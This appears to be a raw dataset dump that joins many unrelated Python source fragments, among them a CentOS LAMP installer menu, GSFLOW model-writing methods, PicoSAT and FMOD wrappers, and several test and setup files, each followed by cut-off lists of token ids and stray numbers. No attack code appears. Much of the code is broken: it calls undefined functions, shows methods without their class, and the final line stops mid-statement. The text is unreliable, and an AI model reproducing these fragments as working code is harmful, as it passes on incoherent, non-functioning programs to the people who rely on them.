#'endDirectiveNamesAndHandlers':{} #'macroDirectives':{} } ################################################## ## METHOD COMPILERS ################################################## ## CLASS COMPILERS _initMethod_initCheetah = """\ if not self._CHEETAH__instanceInitialized: cheetahKWArgs = {} allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split() for k,v in KWs.items(): if k in allowedKWs: cheetahKWArgs[k] = v self._initCheetahInstance(**cheetahKWArgs) """.replace('\n','\n'+' '*8) ################################################## ## MODULE COMPILERS ################################################## ## Make Compiler an alias for ModuleCompiler Compiler = ModuleCompiler
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 720, 7390, 25, 3082, 5329, 13, 9078, 11, 85, 352, 13, 18294, 4793, 14, 3312, 14, 1828, 3571, 25, 1507, 25, 1828, 256, 23401, 62, 81, 4185, 5518, 720, 198, 37811, 7293, 5329, 609...
2.761398
2,347
# -*- coding: utf-8 -*-

import compat
import unittest
import sys

from plmn.utils import *
from plmn.results import *
from plmn.modem_cmds import *
from plmn.simple_cmds import *

if __name__ == '__main__':
    nargs = process_args()
    unittest.main(argv=sys.argv[nargs:], exit=False)
    Results.print_results()
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 11748, 8330, 198, 11748, 555, 715, 395, 198, 11748, 25064, 198, 198, 6738, 458, 10295, 13, 26791, 1330, 1635, 198, 6738, 458, 10295, 13, 43420, 1330, 1635, 198, 673...
2.536
125
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import collections

import mock
from oslo_versionedobjects import fixture as object_fixture

from mogan.notifications import base as notification_base
from mogan.notifications.objects import base as notification
from mogan.objects import base
from mogan.objects import fields
from mogan.objects import server as server_obj
from mogan.tests import base as test_base
from mogan.tests.unit.db import utils as db_utils

notification_object_data = {
    'ServerPayload': '1.0-30fefa8478f1b9b35c66868377fb6dfd',
    'ServerAddressesPayload': '1.0-69caf4c36f36756bb1f6970d093ee1f6',
    'ServerActionPayload': '1.0-8dc4429afa34d86ab92c9387e3ccd0c3',
    'ServerActionNotification': '1.0-20087e599436bd9db62ae1fb5e2dfef2',
    'ExceptionPayload': '1.0-7c31986d8d78bed910c324965c431e18',
    'EventType': '1.0-589894aac7c98fb640eca394f67ad621',
    'NotificationPublisher': '1.0-4b0b0d662b21eeed0b23617f3f11794b'
}
[ 2, 1439, 6923, 33876, 13, 198, 2, 198, 2, 220, 220, 220, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 345, 743, 198, 2, 220, 220, 220, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789,...
2.792593
540
from plash.eval import eval, register_macro, shell_escape_args eval([[ 'defpm', 'apt', 'apt-get update', 'apt-get install -y {}', ], [ 'defpm', 'add-apt-repository', 'apt-get install software-properties-common', 'run add-apt-repository -y {}', ], [ 'defpm', 'apk', 'apk update', 'apk add {}', ], [ 'defpm', 'yum', 'yum install -y {}', ], [ 'defpm', 'dnf', 'dnf install -y {}', ], [ 'defpm', 'pip', 'pip install {}', ], [ 'defpm', 'pip3', 'pip3 install {}', ], [ 'defpm', 'npm', 'npm install -g {}', ], [ 'defpm', 'pacman', 'pacman -Sy --noconfirm {}', ], [ 'defpm', 'emerge', 'emerge {}', ]])
[ 6738, 458, 1077, 13, 18206, 1330, 5418, 11, 7881, 62, 20285, 305, 11, 7582, 62, 41915, 62, 22046, 628, 198, 198, 18206, 26933, 58, 198, 220, 220, 220, 705, 4299, 4426, 3256, 198, 220, 220, 220, 705, 2373, 3256, 198, 220, 220, 220, ...
1.93617
376
from typing import Optional, List

from pydantic import BaseModel, EmailStr

from . import result
[ 6738, 19720, 1330, 32233, 11, 7343, 198, 198, 6738, 279, 5173, 5109, 1330, 7308, 17633, 11, 9570, 13290, 198, 198, 6738, 764, 1330, 1255, 628, 198 ]
3.846154
26
from rankedchoicevoting import Poll


candidatesA = {"Bob": 0, "Sue": 0, "Bill": 0}

#votes in array sorted by first choice to last choice
votersA = {
    "a": ['Bob', 'Bill', 'Sue'],
    "b": ['Sue', 'Bob', 'Bill'],
    "c": ['Bill', 'Sue', 'Bob'],
    "d": ['Bob', 'Bill', 'Sue'],
    "f": ['Sue', 'Bob', 'Bill']
}

election = Poll(candidatesA,votersA)
election.addCandidate("Joe", 0)
election.addVoter("g",['Joe','Bob'])

print("Winner: " + election.getPollResults())
[ 6738, 10307, 25541, 85, 10720, 1330, 12868, 628, 198, 46188, 37051, 32, 796, 19779, 18861, 1298, 657, 11, 366, 50, 518, 1298, 657, 11, 366, 17798, 1298, 657, 92, 198, 198, 2, 29307, 287, 7177, 23243, 416, 717, 3572, 284, 938, 3572, ...
2.435233
193
#!/usr/bin/env python # -*- coding: utf-8 -*- # -*- author: Alex -*- from Centos6_Bit64 import * from SystemUtils import * # Checking version of OS should happened before menu appears # Check version of CentOS SystemUtils.check_centos_version() # Clear screen before to show menu os.system('clear') answer = True while answer: print (""" LAMP Deploy Script V: 0.1 for CentOS 6.5/6.6 64Bit: --------------------------------------------------- 1. Check version of your CentOS 2. Check Internet connection 3. Show me my local IP address 4. Open port 80 to Web 5. Show me my localhost name ------- LAMP for CentOS 6.x ----------- 6. Install EPEL & IUS repository 7. Install Web Server - Apache 8. Install Database - MySQL 9. Install Language - PHP 10. Install LAMP in "One Click" - CentOS 6.x 11. Exit/Quit """) answer = input("Please make your choice: ") if answer == 1: os.system('clear') print ('\nChecking version of the system: ') SystemUtils.check_centos_version() elif answer == 2: os.system('clear') print ('\nChecking if you connected to the Internet') SystemUtils.check_internet_connection() elif answer == 3: os.system('clear') print ('\nYour local IP address is: ' + SystemUtils.check_local_ip()) elif answer == 4: os.system('clear') print('\nChecking firewall') Centos6Deploy.iptables_port() elif answer == 5: print "Checking local hostname..." SystemUtils.check_host_name() elif answer == 6: print ('\nInstalling EPEL and IUS repository to the system...') Centos6Deploy.add_repository() elif answer == 7: print ('\nInstalling Web Server Apache...') Centos6Deploy.install_apache() elif answer == 8: print ('\nInstalling database MySQL...') Centos6Deploy.install_mysql() elif answer == 9: print('\nInstalling PHP...') Centos6Deploy.install_php() elif answer == 10: print ('Install LAMP in "One Click" - CentOS 6.x') Centos6Deploy.iptables_port() Centos6Deploy.add_repository() Centos6Deploy.install_mysql() Centos6Deploy.install_php() elif answer == 11: print("\nGoodbye...\n") answer = None else: print ('\nNot valid Choice, Try Again') answer = True
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 532, 9, 12, 1772, 25, 4422, 532, 9, 12, 198, 198, 6738, 1979, 418, 21, 62, 13128, 2414, 1330, 1635, 198, 6738, ...
2.520291
961
import asyncio
import os
import time
from dataclasses import dataclass

import requests_unixsocket
from aiohttp import ClientSession, web


replicas = replicas_discovery()
self_id = next(filter(lambda x: x.is_self, replicas)).replica_id
print(replicas, flush=True)

app = web.Application()
app.add_routes([web.get('/', index), web.get('/hello', hello)])
web.run_app(app, host='0.0.0.0', port=8080)
[ 11748, 30351, 952, 198, 11748, 28686, 198, 11748, 640, 198, 6738, 4818, 330, 28958, 1330, 4818, 330, 31172, 198, 198, 11748, 7007, 62, 403, 844, 44971, 198, 6738, 257, 952, 4023, 1330, 20985, 36044, 11, 3992, 628, 628, 198, 35666, 44645...
2.592593
162
from __future__ import absolute_import
from setuptools import setup

from txjsonrpc import meta
from txjsonrpc.util import dist


setup(
    name=meta.display_name,
    version=meta.version,
    description=meta.description,
    author=meta.author,
    author_email=meta.author_email,
    url=meta.url,
    license=meta.license,
    packages=dist.findPackages(meta.library_name),
    long_description=dist.catReST(
        "docs/PRELUDE.txt",
        "README",
        "docs/DEPENDENCIES.txt",
        "docs/INSTALL.txt",
        "docs/USAGE.txt",
        "TODO",
        "docs/HISTORY.txt",
        stop_on_errors=True,
        out=True),
    classifiers=[
        "Development Status :: 4 - Beta",
        "Intended Audience :: Developers",
        "Programming Language :: Python",
    ],
)
[ 6738, 11593, 37443, 834, 1330, 4112, 62, 11748, 198, 6738, 900, 37623, 10141, 1330, 9058, 198, 198, 6738, 27765, 17752, 81, 14751, 1330, 13634, 198, 6738, 27765, 17752, 81, 14751, 13, 22602, 1330, 1233, 628, 198, 40406, 7, 198, 220, 220...
2.278409
352
# -*- coding: utf-8 -*- import os from .control import ControlFile from .prms import PrmsModel from .utils import gsflow_io, GsConstant from .prms import Helper from .modflow import Modflow from .modsim import Modsim import flopy import subprocess as sp import platform import warnings warnings.simplefilter("always", PendingDeprecationWarning) warnings.simplefilter("always", UserWarning) def write_input(self, basename=None, workspace=None, write_only=None): """ Write input files for gsflow. Four cases are possible: (1) if basename and workspace are None,then the exisiting files will be overwritten (2) if basename is specified, only file names will be changes (3) if only workspace is specified, only folder will be changed (4) when both basename and workspace are specifed both files are changed Parameters ---------- basename : str project basename workspace : str model output directory write_only: a list ['control', 'parameters', 'prms_data', 'mf', 'modsim'] Examples -------- >>> gsf = gsflow.GsflowModel.load_from_file('gsflow.control') >>> gsf.write_input(basename="new", workspace="../new_model") """ print("Writing the project files .....") if workspace is not None: workspace = os.path.abspath(workspace) if (basename, workspace) == (None, None): print("Warning: input files will be overwritten....") self._write_all(write_only) # only change the directory elif basename is None and workspace is not None: if not (os.path.isdir(workspace)): os.mkdir(workspace) fnn = os.path.basename(self.control.control_file) self.control.model_dir = workspace self.control.control_file = os.path.join(workspace, fnn) self.control_file = os.path.join(workspace, fnn) if self.prms is not None: self.prms.control_file = self.control_file # change parameters new_param_file_list = [] for par_record in self.prms.parameters.parameters_list: curr_file = os.path.basename(par_record.file_name) curr_file = os.path.join(workspace, curr_file) par_record.file_name = curr_file if not (curr_file in new_param_file_list): new_param_file_list.append(curr_file) self.control.set_values("param_file", new_param_file_list) # change datafile curr_file = os.path.relpath( os.path.join(workspace, self.prms.data.name), self.control.model_dir, ) self.prms.data.model_dir = workspace self.control.set_values("data_file", [curr_file]) # change mf if self.mf is not None: self.mf.change_model_ws(workspace, reset_external=True) mfnm = self.mf.name + ".nam" self.control.set_values("modflow_name", [mfnm]) # update file names in control object self._update_control_fnames(workspace, basename) # write if self.prms is not None: self.prms.control = self.control self._write_all(write_only) # only change the basename elif basename is not None and workspace is None: cnt_file = basename + "_cont.control" ws_ = os.path.dirname(self.control.control_file) self.control.control_file = os.path.join(ws_, cnt_file) self.control_file = os.path.join(ws_, cnt_file) self.prms.control_file = self.control_file # change parameters flist = self.prms.parameters.parameter_files new_param_file_list = [] for ifile, par_record in enumerate( self.prms.parameters.parameters_list ): file_index = flist.index(par_record.file_name) par_file = basename + "_par_{}.params".format(file_index) curr_dir = self.control.model_dir curr_file = os.path.join(curr_dir, par_file) par_record.file_name = curr_file if not (curr_file in new_param_file_list): new_param_file_list.append(curr_file) self.control.set_values("param_file", new_param_file_list) # change datafile dfile = basename + "_dat.data" 
curr_file = os.path.relpath( os.path.join(self.prms.data.model_dir, dfile), self.control.model_dir, ) self.prms.data.name = dfile self.control.set_values("data_file", [curr_file]) # change mf if self.mf is not None: curr_dir = self.mf.model_ws self.mf._set_name(basename) self._update_mf_basename(basename) mfnm = self.mf.name + ".nam" self.control.set_values("modflow_name", [mfnm]) # update file names in control object self._update_control_fnames(workspace, basename) self.prms.control = self.control self._write_all(write_only) # change both directory & basename elif basename is not None and workspace is not None: if not (os.path.isdir(workspace)): os.mkdir(workspace) cnt_file = basename + "_cont.control" self.control.model_dir = workspace self.control.control_file = os.path.join(workspace, cnt_file) self.prms.control_file = self.control.control_file self.control_file = self.control.control_file # change parameters # get param files list flist = self.prms.parameters.parameter_files new_param_file_list = [] for ifile, par_record in enumerate( self.prms.parameters.parameters_list ): file_index = flist.index(par_record.file_name) par_file = basename + "_par_{}.params".format(file_index) curr_file = os.path.join(workspace, par_file) par_record.file_name = curr_file if not (curr_file in new_param_file_list): new_param_file_list.append(curr_file) self.control.set_values("param_file", new_param_file_list) # change datafile dfile = basename + "_dat.data" curr_file = os.path.relpath( os.path.join(workspace, dfile), self.control.model_dir ) self.prms.data.model_dir = workspace self.prms.data.name = dfile self.control.set_values("data_file", [curr_file]) # flatten mf if self.mf is not None: self.mf.change_model_ws(workspace) self.mf._set_name(os.path.join(workspace, basename)) self._update_mf_basename(basename) mfnm = basename + ".nam" self.control.set_values( "modflow_name", [ os.path.relpath( os.path.join(workspace, mfnm), self.control.model_dir ) ], ) # update file names in control object self._update_control_fnames(workspace, basename) self.prms.control = self.control self._write_all(write_only) else: raise NotImplementedError() def _update_control_fnames(self, workspace, basename): """ Method to update control file names and paths Parameters ---------- workspace : str model output directory basename : str project basename """ if workspace is not None and basename is None: self.control.model_dir = workspace for rec_name in GsConstant.GSFLOW_FILES: if rec_name in self.control.record_names: file_values = self.control.get_values(rec_name) file_value = [] for fil in file_values: va = os.path.join(workspace, os.path.basename(fil)) va = os.path.relpath(va, self.control.model_dir) file_value.append(va) self.control.set_values(rec_name, file_value) else: for rec_name in GsConstant.GSFLOW_FILES: if rec_name in self.control.record_names: if rec_name in ("modflow_name",): continue elif rec_name in ( "modflow_name", "param_file", "data_file", ): file_values = self.control.get_values(rec_name) file_value = [] for fil in file_values: ws, filvalue = os.path.split(fil) if not ws: pass else: filvalue = os.path.relpath( fil, self.control.model_dir ) file_value.append(filvalue) self.control.set_values(rec_name, file_value) else: file_values = self.control.get_values(rec_name) file_value = [] for fil in file_values: if workspace is None: workspace = self.control.model_dir vvfile = rec_name.split("_") del vvfile[-1] vvfile = "_".join(vvfile) if "." 
in fil: ext = fil.split(".")[-1] else: ext = "dat" vvfile = basename + "_" + vvfile + "." + ext filvalue = os.path.join(workspace, vvfile) filvalue = os.path.relpath( filvalue, self.control.model_dir ) file_value.append(filvalue) self.control.set_values(rec_name, file_value) def _update_mf_basename(self, basename): """ Convience method to update modflow Basename Parameters ---------- basename : str basename of the Modflow object """ out_files_list = [] for ix, out_file in enumerate(self.mf.output_fnames): if out_file.count(".") > 1: ext = out_file.split(".") del ext[0] ext = ".".join(ext) else: ext = out_file.split(".")[-1] new_outfn = "{}.{}".format(basename, ext) out_files_list.append(new_outfn) self.mf.output_fnames = out_files_list def _write_all(self, write_only): """ Method to write input files Parameters ---------- write_only : list list of files to write accepts, control, parameters, prms_data, mf, and modsim """ write_only_options = ( "control", "parameters", "prms_data", "mf", "modsim", ) if write_only is not None: if not isinstance(write_only, list): raise ValueError("write_only agrgument must be a list") # make write options case insensitive write_only = [i.lower() for i in write_only] for write_option in write_only: if not (write_option in write_only_options): raise ValueError( "The option '{}' is not recognized...".format( write_option ) ) else: write_only = () # write control if len(write_only) == 0 or "control" in write_only: print("Writing Control file ...") self.control.write() if self.prms is not None: # self write parameters if len(write_only) == 0 or "parameters" in write_only: print("Writing Parameters files ...") self.prms.parameters.write() # write data if len(write_only) == 0 or "prms_data" in write_only: print("Writing Data file ...") self.prms.data.write() # write mf if self.mf is not None: if len(write_only) == 0 or "mf" in write_only: print("Writing Modflow files...") self.mf.write_input() if self.modsim is not None: if len(write_only) == 0 or "modsim" in write_only: print("Writing MODSIM shapefile") self.modsim.write_modsim_shapefile() def run_model(self, model_ws=".", forgive=False, gsflow_exe=None): """ Method to run a gsflow model Parameters ---------- model_ws : str parameter to specify the model directory forgive : bool forgives convergence issues gslfow_exe : str or None path to gsflow_exe, if gsflow_exe is None it will use the previously defined gsflow_exe variable or the default gsflow.exe. Returns ------- None or (success, buffer) Examples -------- >>> gsf = gsflow.GsflowModel.load_from_file("gsflow.control") >>> gsf.run_model() """ fn = self.control_file if gsflow_exe is None: gsflow_exe = self.gsflow_exe if not os.path.isfile(gsflow_exe): print( "Warning : The executable of the model could not be found. " "Use the gsflow_exe= parameter to define its path... " ) return None normal_msg = [ "normal termination", ] # , "simulation successful"] if forgive: normal_msg.append("failed to meet solver convergence criteria") return self.__run( exe_name=gsflow_exe, namefile=fn, normal_msg=normal_msg, model_ws=model_ws, ) def __run( self, exe_name, namefile, model_ws=".", silent=False, report=False, normal_msg="normal termination", cargs=None, ): """ This function will run the model using subprocess.Popen. Parameters ---------- exe_name : str Executable name (with path, if necessary) to run. namefile : str Namefile of model to run. The namefile must be the filename of the namefile without the path. model_ws : str Path to the location of the namefile. 
(default is the current working directory - './') silent : boolean Echo run information to screen (default is True). report : boolean, optional Save stdout lines to a list (buff) which is returned by the method . (default is False). normal_msg : str Normal termination message used to determine if the run terminated normally. (default is 'normal termination') cargs : str or list of strings additional command line arguments to pass to the executable. Default is None Returns ------- (success, buff) success : boolean buff : list of lines of stdout """ success = False buff = [] # convert normal_msg to lower case for comparison if isinstance(normal_msg, str): normal_msg = [normal_msg.lower()] elif isinstance(normal_msg, list): for idx, s in enumerate(normal_msg): normal_msg[idx] = s.lower() # Check to make sure that program and namefile exist exe = which(exe_name) if exe is None: if platform.system() in "Windows": if not exe_name.lower().endswith(".exe"): exe = which(exe_name + ".exe") if exe is None: s = "The program {} does not exist or is not executable.".format( exe_name ) raise Exception(s) else: if not silent: s = "pyGSFLOW is using the following executable to run the model: {}".format( exe ) print(s) exe = os.path.normpath(os.path.join(os.getcwd(), exe)) if not os.path.isfile(os.path.join(model_ws, namefile)): s = "The namefile for this model does not exists: {}".format( namefile ) raise Exception(s) # simple little function for the thread to target # def q_output(output, q): # for line in iter(output.readline, b''): # q.put(line) # time.sleep(1) # output.close() # create a list of arguments to pass to Popen argv = [exe, namefile] # add additional arguments to Popen arguments if cargs is not None: if isinstance(cargs, str): cargs = [cargs] for t in cargs: argv.append(t) # run the model with Popen # if platform.system().lower() == "windows": # self._generate_batch_file() # cargv = self.__bat_file # else: # pass model_ws = os.path.dirname(self.control_file) proc = sp.Popen(argv, stdout=sp.PIPE, stderr=sp.STDOUT, cwd=model_ws) while True: line = proc.stdout.readline() c = line.decode("utf-8") if c != "": for msg in normal_msg: if msg in c.lower(): success = True break c = c.rstrip("\r\n") if not silent: print("{}".format(c)) if report: buff.append(c) else: break return success, buff
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 11748, 28686, 198, 6738, 764, 13716, 1330, 6779, 8979, 198, 6738, 764, 1050, 907, 1330, 1736, 907, 17633, 198, 6738, 764, 26791, 1330, 308, 82, 11125, 62, 952, 11, 402, ...
1.897601
9,922
import logging

import pytest
from moto import mock_ec2, mock_iam, mock_sts

from cloudwanderer.cloud_wanderer_resource import CloudWandererResource
from cloudwanderer.storage_connectors import MemoryStorageConnector
from cloudwanderer.urn import URN
from tests.pytest_helpers import create_ec2_instances

logger = logging.getLogger(__name__)


def test_delete_subresources_from_resource(memory_connector, iam_role, iam_role_policies):
    """If we are deleting a parent resource we should delete all its subresources."""
    memory_connector.write_resource(resource=iam_role)
    memory_connector.write_resource(resource=iam_role_policies[0])
    memory_connector.write_resource(resource=iam_role_policies[1])
    role_before_delete = memory_connector.read_resource(urn=iam_role.urn)
    role_policy_1_before_delete = memory_connector.read_resource(urn=iam_role_policies[0].urn)
    role_policy_2_before_delete = memory_connector.read_resource(urn=iam_role_policies[1].urn)

    # Delete the parent and ensure the subresources are also deleted
    memory_connector.delete_resource(urn=iam_role.urn)
    role_after_delete = memory_connector.read_resource(urn=iam_role.urn)
    role_policy_1_after_delete = memory_connector.read_resource(urn=iam_role_policies[0].urn)
    role_policy_2_after_delete = memory_connector.read_resource(urn=iam_role_policies[1].urn)

    assert role_before_delete.urn == iam_role.urn
    assert role_policy_1_before_delete.urn == iam_role_policies[0].urn
    assert role_policy_2_before_delete.urn == iam_role_policies[1].urn
    assert role_after_delete is None
    assert role_policy_1_after_delete is None
    assert role_policy_2_after_delete is None
[ 11748, 18931, 198, 198, 11748, 12972, 9288, 198, 6738, 285, 2069, 1330, 15290, 62, 721, 17, 11, 15290, 62, 1789, 11, 15290, 62, 6448, 198, 198, 6738, 6279, 86, 392, 11882, 13, 17721, 62, 86, 392, 11882, 62, 31092, 1330, 10130, 54, 3...
2.861252
591
"""Python wrapper around the _clibs PicoSAT extension.""" import os from tt.errors.arguments import ( InvalidArgumentTypeError, InvalidArgumentValueError) if os.environ.get('READTHEDOCS') != 'True': from tt._clibs import picosat as _c_picosat VERSION = _c_picosat.VERSION def sat_one(clauses, assumptions=None): """Find a solution that satisfies the specified clauses and assumptions. This provides a light Python wrapper around the same method in the PicoSAT C-extension. While completely tested and usable, this method is probably not as useful as the interface provided through the :func:`sat_one <tt.expressions.bexpr.BooleanExpression.sat_one>` method in the :class:`BooleanExpression <tt.expressions.bexpr.BooleanExpression>` class. :param clauses: CNF (AND of ORs) clauses; positive integers represent non-negated terms and negative integers represent negated terms. :type clauses: List[List[:class:`int <python:int>`]] :param assumptions: Assumed terms; same negation logic from ``clauses`` applies here. Note that assumptions *cannot* be an empty list; leave it as ``None`` if there are no assumptions to include. :type assumptions: List[:class:`int <python:int>`] :returns: If solution is found, a list of ints representing the terms of the solution; otherwise, if no solution found, ``None``. :rtype: List[:class:`int <python:int>`] or ``None`` :raises InvalidArgumentTypeError: If ``clauses`` is not a list of lists of ints or ``assumptions`` is not a list of ints. :raises InvalidArgumentValueError: If any literal ints are equal to zero. Let's look at a simple example with no satisfiable solution:: >>> from tt import picosat >>> picosat.sat_one([[1], [-1]]) is None True Here's an example where a solution exists:: >>> picosat.sat_one([[1, 2, 3], [-2, -3], [1, -2], [2, -3], [-2]]) [1, -2, -3] Finally, here's an example using assumptions:: >>> picosat.sat_one([[1, 2, 3], [2, 3]], assumptions=[-1, -3]) [-1, 2, -3] """ try: return _c_picosat.sat_one(clauses, assumptions=assumptions) except TypeError as e: raise InvalidArgumentTypeError(str(e)) except ValueError as e: raise InvalidArgumentValueError(str(e)) def sat_all(clauses, assumptions=None): """Find all solutions that satisfy the specified clauses and assumptions. This provides a light Python wrapper around the same method in the PicoSAT C-extension. While completely tested and usable, this method is probably not as useful as the interface provided through the :func:`sat_all <tt.expressions.bexpr.BooleanExpression.sat_all>` method in the :class:`BooleanExpression <tt.expressions.bexpr.BooleanExpression>` class. :param clauses: CNF (AND of ORs) clauses; positive integers represent non-negated terms and negative integers represent negated terms. :type clauses: List[List[:class:`int <python:int>`]] :param assumptions: Assumed terms; same negation logic from ``clauses`` applies here. Note that assumptions *cannot* be an empty list; leave it as ``None`` if there are no assumptions to include. :type assumptions: List[:class:`int <python:int>`] :returns: An iterator of solutions; if no satisfiable solutions exist, the iterator will be empty. :rtype: Iterator[List[:class:`int <python:int>`]] :raises InvalidArgumentTypeError: If ``clauses`` is not a list of lists of ints or ``assumptions`` is not a list of ints. :raises InvalidArgumentValueError: If any literal ints are equal to zero. Here's an example showing the basic usage:: >>> from tt import picosat >>> for solution in picosat.sat_all([[1], [2, 3, 4], [2, 3]]): ... print(solution) ... 
[1, 2, 3, 4] [1, 2, 3, -4] [1, 2, -3, 4] [1, 2, -3, -4] [1, -2, 3, 4] [1, -2, 3, -4] We can cut down on some of the above solutions by including an assumption:: >>> for solution in picosat.sat_all([[1], [2, 3, 4], [2, 3]], ... assumptions=[-3]): ... print(solution) ... [1, 2, -3, 4] [1, 2, -3, -4] """ try: return _c_picosat.sat_all(clauses, assumptions=assumptions) except TypeError as e: raise InvalidArgumentTypeError(str(e)) except ValueError as e: raise InvalidArgumentValueError(str(e))
[ 37811, 37906, 29908, 1088, 262, 4808, 565, 571, 82, 350, 3713, 50, 1404, 7552, 526, 15931, 198, 198, 11748, 28686, 198, 198, 6738, 256, 83, 13, 48277, 13, 853, 2886, 1330, 357, 198, 220, 220, 220, 17665, 28100, 1713, 6030, 12331, 11, ...
2.598078
1,769
import os
import re
import shutil
import unittest
from pathlib import Path
from dianna.visualization.text import highlight_text


def _split_text_into_words(text):
    # regex taken from
    # https://stackoverflow.com/questions/12683201/python-re-split-to-split-by-spaces-commas-and-periods-but-not-in-cases-like
    # explanation: split by \s (whitespace), and only split by commas and
    # periods if they are not followed (?!\d) or preceded (?<!\d) by a digit.
    regex = r'\s|(?<!\d)[,.](?!\d)'
    return re.split(regex, text)
[ 11748, 28686, 198, 11748, 302, 198, 11748, 4423, 346, 198, 11748, 555, 715, 395, 198, 6738, 3108, 8019, 1330, 10644, 198, 6738, 288, 666, 2616, 13, 41464, 1634, 13, 5239, 1330, 7238, 62, 5239, 628, 628, 198, 198, 4299, 4808, 35312, 62...
2.663366
202
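A quick, self-contained illustration of the split regex used above; the sample sentence is made up for demonstration.

import re

regex = r'\s|(?<!\d)[,.](?!\d)'
print(re.split(regex, 'It costs 3.5, maybe more.'))
# ['It', 'costs', '3.5,', 'maybe', 'more', '']
# '3.5' keeps its decimal point (the '.' sits between digits), the comma after it
# is also kept (it is preceded by a digit), and the final '.' leaves a trailing empty string.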
import os
import sys
import builtins
import versioneer

if sys.version_info[:2] < (3, 7):
    raise RuntimeError("Python version >= 3.7 required.")

builtins.__RBC_SETUP__ = True

if os.path.exists('MANIFEST'):
    os.remove('MANIFEST')

CONDA_BUILD = int(os.environ.get('CONDA_BUILD', '0'))
CONDA_ENV = os.environ.get('CONDA_PREFIX', '') != ''

from setuptools import setup, find_packages  # noqa: E402

DESCRIPTION = "RBC - Remote Backend Compiler Project"

LONG_DESCRIPTION = """
The aim of the Remote Backend Compiler project is to distribute the
tasks of a program JIT compilation process to separate computer systems
using the client-server model. The frontend of the compiler runs on the
client computer and the backend runs on the server computer. The
compiler frontend will send the program code to compiler backend in IR
form where it will be compiled to machine code.
"""

if __name__ == '__main__':
    setup_package()
    del builtins.__RBC_SETUP__
[ 11748, 28686, 198, 11748, 25064, 198, 11748, 3170, 1040, 198, 11748, 2196, 28153, 198, 198, 361, 25064, 13, 9641, 62, 10951, 58, 25, 17, 60, 1279, 357, 18, 11, 767, 2599, 198, 220, 220, 220, 5298, 43160, 12331, 7203, 37906, 2196, 1818...
3.126623
308
""" Schedule adjustments are functions that accept a `datetime` and modify it in some way. Adjustments have the signature `Callable[[datetime], datetime]`. """ from datetime import datetime, timedelta from typing import Callable import pendulum import prefect.schedules.filters def add(interval: timedelta) -> Callable[[datetime], datetime]: """ Adjustment that adds a specified interval to the date. Args: - interval (timedelta): the amount of time to add Returns: - Callable[[datetime], bool]: the adjustment function """ return _adjustment_fn def next_weekday(dt: datetime) -> datetime: """ Adjustment that advances a date to the next weekday. If the date is already a weekday, it is returned unadjusted. Args: - dt (datetime): the datetime to adjust Returns: - datetime: the adjusted datetime """ pdt = pendulum.instance(dt) while not prefect.schedules.filters.is_weekday(pdt): pdt = pdt.add(days=1) return pdt
[ 37811, 198, 27054, 5950, 16895, 389, 5499, 326, 2453, 257, 4600, 19608, 8079, 63, 290, 13096, 340, 287, 617, 835, 13, 198, 198, 39668, 902, 423, 262, 9877, 4600, 14134, 540, 30109, 19608, 8079, 4357, 4818, 8079, 60, 44646, 198, 37811, ...
2.860724
359
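A short usage sketch of the two adjustments defined above; the module path and the example dates are assumptions for illustration only.

from datetime import datetime, timedelta

# Module path assumed; the snippet above looks like prefect/schedules/adjustments.py.
from prefect.schedules.adjustments import add, next_weekday

# `add` returns an adjustment that shifts any datetime by a fixed interval.
shift = add(timedelta(hours=6))
print(shift(datetime(2021, 1, 1, 9, 0)))   # 2021-01-01T15:00:00+00:00 (a pendulum DateTime)

# `next_weekday` rolls a weekend date forward to the following Monday.
print(next_weekday(datetime(2021, 1, 2)))  # Saturday -> 2021-01-04T00:00:00+00:00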
from .fmodobject import * from .fmodobject import _dll from .structures import TAG, VECTOR from .globalvars import get_class class Sound(FmodObject): def get_length(self, ltype): len = c_uint() ckresult(_dll.FMOD_Sound_GetLength(self._ptr, byref(len), ltype)) return len.value def get_music_channel_volume(self, channel): v = c_float() ckresult(_dll.FMOD_Sound_GetMusicChannelVolume(self._ptr, channel, byref(v))) return v.value def set_music_channel_volume(self, id, vol): ckresult(_dll.FMOD_Sound_SetMusicChannelVolume(self._ptr, id, c_float(vol))) def get_subsound(self, index): sh_ptr = c_void_p() ckresult(_dll.FMOD_Sound_GetSubSound(self._ptr, index, byref(sh_ptr))) return Sound(sh_ptr) def get_sync_point(self, index): sp = c_int() ckresult(_dll.FMOD_Sound_GetSyncPoint(self._ptr, index, byref(sp))) return sp.value def get_sync_point_info(self, point): name = c_char_p() offset = c_uint() offsettype = c_int() ckresult(_dll.FMOD_Sound_GetSyncPointInfo(self._ptr, point, byref(name), 256, byref(offset), byref(offsettype))) return so(name=name.value, offset=offset.value, offset_type=offsettype.value) def lock(self, offset, length): ptr1 = c_void_p() len1 = c_uint() ptr2 = c_void_p() len2 = c_uint() ckresult(_dll.FMOD_Sound_Lock(self._ptr, offset, length, byref(ptr1), byref(ptr2), byref(len1), byref(len2))) return ((ptr1, len1), (ptr2, len2)) def release(self): ckresult(_dll.FMOD_Sound_Release(self._ptr)) def set_subsound(self, index, snd): check_type(snd, Sound) ckresult(_dll.FMOD_Sound_SetSubSound(self._ptr, index, snd._ptr)) def set_subsound_sentence(self, sounds): a = c_int * len(sounds) ptrs = [o._ptr for o in sounds] ai = a(*ptrs) ckresult(_dll.FMOD_Sound_SetSubSoundSentence(self._ptr, ai, len(ai))) def unlock(self, i1, i2): """I1 and I2 are tuples of form (ptr, len).""" ckresult(_dll.FMOD_Sound_Unlock(self._ptr, i1[0], i2[0], i1[1], i2[1])) def read_data(self, length): """Read a fragment of the sound's decoded data. :param length: The requested length. :returns: The data and the actual length. :rtype: Tuple of the form (data, actual).""" buf = create_string_buffer(length) actual = 